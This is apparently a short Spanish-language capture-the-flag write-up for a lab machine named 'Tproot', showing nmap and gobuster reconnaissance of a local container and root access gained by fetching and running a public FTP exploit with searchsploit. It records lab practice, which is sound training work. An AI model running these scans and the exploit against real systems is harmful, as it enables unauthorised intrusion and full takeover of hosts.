Tproot

✍️ Autor: d1se0🔍 Dificultad: Muy Fácil 📅 Fecha de creación: 10/02/2025

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 21 perteneciente al servicio FTP y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p21,80 -v 172.17.0.2

para obtener más información sobre esos puertos específicamente.

Revisamos el puerto 80 que es la página de por defecto del Apache.

Tampoco en el código fuente encontramos algo relevante por lo que revisaremos los directorios.

gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml

No encontramos nada relevante en el puerto 80 por lo que indagaremos en el puerto 21. Revisando la versión del puerto contiene cierta vulnerabilidad importante por lo que vamos a explotarla.

🚀 EXPLOTACIÓN

Nos lo descargamos.

searchsploit -m unix/remote/49757.py

Ejecutamos.

python3 49757.py 172.17.0.2

🔐 PRIVILEGIOS

whoami

Ya somos root.

Last updated

Was this helpful?